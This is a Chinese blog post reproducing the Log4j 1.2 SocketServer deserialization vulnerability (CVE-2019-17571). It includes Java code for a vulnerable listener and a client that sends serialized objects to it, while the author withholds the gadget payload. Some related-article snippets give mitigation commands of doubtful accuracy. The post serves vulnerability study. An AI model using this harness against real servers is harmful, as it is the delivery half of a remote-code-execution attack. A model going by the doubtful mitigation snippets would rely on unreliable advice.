log4j CVE-2019-17571 漏洞复现

最新推荐文章于 2024-06-12 12:15:11 发布
置顶 最新推荐文章于 2024-06-12 12:15:11 发布
阅读量1.2w 收藏 7
点赞数 2
分类专栏: 开发 jsp web 文章标签: CVE-2019-17571
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhenghongjun822/article/details/103812537
版权

一、漏洞描述

Log4j 1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。

 

二、漏洞复现

2.1 启动SocketServer端

import org.apache.log4j.Logger;
import org.apache.log4j.net.SimpleSocketServer;

public class CVE_2019_17571Server {
    private static final Logger log = Logger.getLogger(SimpleSocketServer.class);

    public static void main(String[] args) throws Exception {

        System.out.println("start log4j Socket Server  Port 5000");

        String[] argss = { "5000", "src/log4j.properties" };

        SimpleSocketServer.main(argss);

        log.info("succ");
    }    
    
}

2.2 Socket 编写以及攻击序列化

 public static void main(String[] args) throws Exception {
        send();
    }

    public static void send() throws Exception {
        Socket skt = new Socket();
        SocketAddress add = new InetSocketAddress("127.0.0.1", 5000);
        skt.connect(add);
        
        Object instance = createPocSerialize();        
        // 序列化
        ByteArrayOutputStream aout = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(aout);
        oos.writeObject(instance);
        oos.flush();
        oos.close();

        OutputStream out = skt.getOutputStream();
        out.write(aout.toByteArray());
        aout.flush();
        out.flush();
        out.close();
        skt.close();

    }

2.3 击代码序列化对象

略。。。。。。(为防止,利用该漏洞攻击他人系统,此处不贴该代码)

 

2.4 运行结果

 

 

3  漏洞分析

  • org.apache.log4j.net.SimpleSocketServer#main()
    首先开启Log4j自带的SocketServer服务器时,会监听设置的端口(本例:5000),传入SocketNode类,启动一个新的线程进行处理.
  • org.apache.log4j.net.SocketNode
    SocketNode类的构造方法中会对socket接收的数据封装为一个Object流对象.

问题就出现在这里 readObject,反序列化时,触发了以上设计好的攻击代码

  • 漏洞修复

    目前官方已在Apache Log4j 2.8.2版本之后修复了该漏洞,请受影响的用户升级至2.8.2 或更高的版本进行防护.

 

 

真命天子_重庆_中国
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用 Elastic Security 检测 CVE-2021-44228 (log4j2) 的漏洞利用
点火三周的专栏
12-12 5748
重要的提示 : 要了解 Elastic 当前如何评估我们产品中此漏洞的内部风险,请参阅此处 概述 这篇博文提供了 CVE-2021-44228 的摘要,并为 Elastic Security 用户提供了检测,以发现他们环境中对该漏洞的主动利用。 随着我们了解更多信息,我们将持续提供更多的更新。截至 2021 年 12 月 11 日星期六,此版本是准确的。可以通过Log4j2的安全页面直接调查来自 Apache 的更新。 CVE-2021-44228 (Log4Shell) 摘要 Lo...
Apache Log4j 漏洞分析
m0_73826804的博客
03-07 427
Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具。Log4j 1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。目前官方已在Apache Log4j 2.8.2版本之后修复了该漏洞,请受影响的用户升级至2.8.2 或更高的版本进行防护.方便测试,添加JDK7U21的漏洞环境。
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行反序列化,当侦听日志数据的不可信网络流量时,与反序列化小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac
Spring Boot常见的报错以及解决方式
最新发布
qq_57320832的博客
06-12 1196
当遇到Spring Boot端口被占用的问题时,首先需要确定端口是否已被其他应用程序占用,然后尝试停止占用端口的进程或修改应用程序的端口配置。在处理过程中,应注意保留重要的工作成果,并遵循良好的开发习惯。当尝试启动Spring Boot应用程序时,如果配置的端口已被其他应用程序占用,那么应用程序将无法在该端口上启动,并会抛出相应的错误。如果在更换端口后仍然遇到端口被占用的问题,可能是由于电脑后台运行的应用过多,或者某个项目添加了另一个项目的依赖导致端口冲突。
(环境搭建+复现CVE-2019-17571 Apache Log4j SocketServer 反序列化漏洞
daxi0ng的博客
04-03 9066
1、【CVE编号】 CVE-2019-17571 2、【漏洞名称】 Apache Log4j SocketServer 反序列化漏洞 3、【靶标分类】 通用漏洞组件类靶标 4、【影响版本】 Log4j1.2.x<=1.2.17 5、【漏洞分类】 代码执行 6、【漏洞等级】 高 7、【漏洞简介】 Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个...
[20][03][81] Log4j 反序列化漏洞(CVE-2019-17571)
安全新司机
12-16 1468
文章目录1. 组件基本信息1.1 pom 信息1.2 影响版本1.3 漏洞场景2. 漏洞复现2.1 引入pom组件2.2 新建 log4j.properties2.3 Log4jLeak 代码2.4 下载 ysoserial.jar2.5 生成 playload2.5 启动程序3. 漏洞源码分析3.1 SimpleSocketServer 类3.2 SocketNode 类4. 反射到外网 1. 组件基本信息 1.1 pom 信息 <groupId>log4j</groupId> &
Apache Log4j 1.2.X反序列化漏洞(CVE-2019-17571)
weixin_44047654的博客
12-11 1541
Apache Log4j 1.2.X反序列化漏洞(CVE-2019-17571)
log4j反序列化漏洞分析(CVE-2019-17571)
热门推荐
杭州七先生的个人博客
04-07 1万+
前言 Apache Log4j反序列化漏洞 影响版本 1.2.4 <= Apache Log4j <= 1.2.17 漏洞复现 idea新建一个项目,如下图所示: log4j: import org.apache.log4j.net.SimpleSocketServer; public class log4j { public static void main(String[] args) { System.out.println("Listening on port
探索 CVE-2019-17571:一款用于网络安全研究的重要工具
gitblog_00007的博客
04-05 462
探索 CVE-2019-17571:一款用于网络安全研究的重要工具 项目地址:https://gitcode.com/shadow-horse/CVE-2019-17571 在网络安全的世界里,了解漏洞并学习如何防护或利用它们是至关重要的。CVE-2019-17571 是一个公开的开源项目,它专注于研究针对 FortiOS 设备的一个严重漏洞。本文将深入探讨这个项目的细节,其技术背景,用途,以及为...
log4j没有生成日志文件_log4j<=1.2.17反序列化漏洞CVE201917571)分析
weixin_39664746的博客
12-04 6389
PS: 文章仅用于研究漏洞原理,促进更好的防御,禁止用于非法用途,否则后果自负!!!log4j是Apache开发的一个日志工具。可以将Web项目中的日志输出到控制台,文件,GUI组件,甚至是套接口服务器。本次出现漏洞就是因为log4j在启动套接口服务器后,对监听端口传入的反序列化数据没有进行过滤而造成的。下面我们以log4j-1.2.17.jar的源码来进行分析。0x01 漏洞分析当...
Java安全之log4j反序列化漏洞分析
qq_43966957的博客
12-29 787
log4j用的其实还是比较多,记录一些Java的日志,这个相信接触过Java的都知道,在此不做多的赘诉。漏洞版本:CVE-2019-17571漏洞原因是因为调用开启一个端口,进行接受数据,进行反序列化操作。根据官方描述作用是把接受到的作为本地的日志记录事件,再使用在服务器端配置的Log4J环境来记录日志。默认可能会开启在4560端口中。
团灭!Log4j 1.x 也爆雷了。。。速速弃用!!
Java技术栈,分享最主流的Java技术
12-29 666
点击关注公众号,Java干货及时送达最近炒得沸沸扬扬的 Log4j2 漏洞门事件,大家应该都修复完了吧,还没修复的看栈长分享的 Log4j2 最新漏洞动态:Log4j 2.3.1 发布!又...
BUUCTF--[FireshellCTF2020]ScreenShooter
qq_46263951的博客
08-26 563
进入页面后首先是让我们输入一个网址,当我们访问百度网址时它会返回百度网页的截图 看大佬的wp上是说这里存在的是CVE-2019-17221漏洞 PhantomJS 到 2.1.1 有一个任意文件读取漏洞,如 file:// URI 的 XMLHttpRequest 所示。该漏洞存在于网页模块的 page.open() 函数中,该函数加载指定的 URL 并调用给定的回调。攻击者可以提供特制的 HTML 文件作为用户输入,允许读取文件系统上的任意文件。例如,如果 page.render() ...
Linux TCP漏洞 CVE-2019-11477 CentOS7 修复方法
jingde528的博客
11-05 979
Linux TCP漏洞 CVE-2019-11477 CentOS7 修复方法 CVE-2019-11477漏洞简单介绍https://cert.360.cn/warning/detail?id=27d0c6b825c75d8486c446556b9c9b68 RedHat用户可以使用以下脚本来检查系统是否存在漏洞https://access.redhat.com/sites/default...
CVE-2019-12272 OpenWrt图形化管理界面LuCI命令注入分析
systemino的博客
07-16 2785
漏洞简介 ·OpenWrt LuCI是一款用于OpenWrt(Linux发行版)的图形化配置界面。 ·OpenWrt LuCI 0.10及之前版本中的admin/status/realtime/bandwidth_status和admin/status/realtime/wireless_status端点存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤...
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值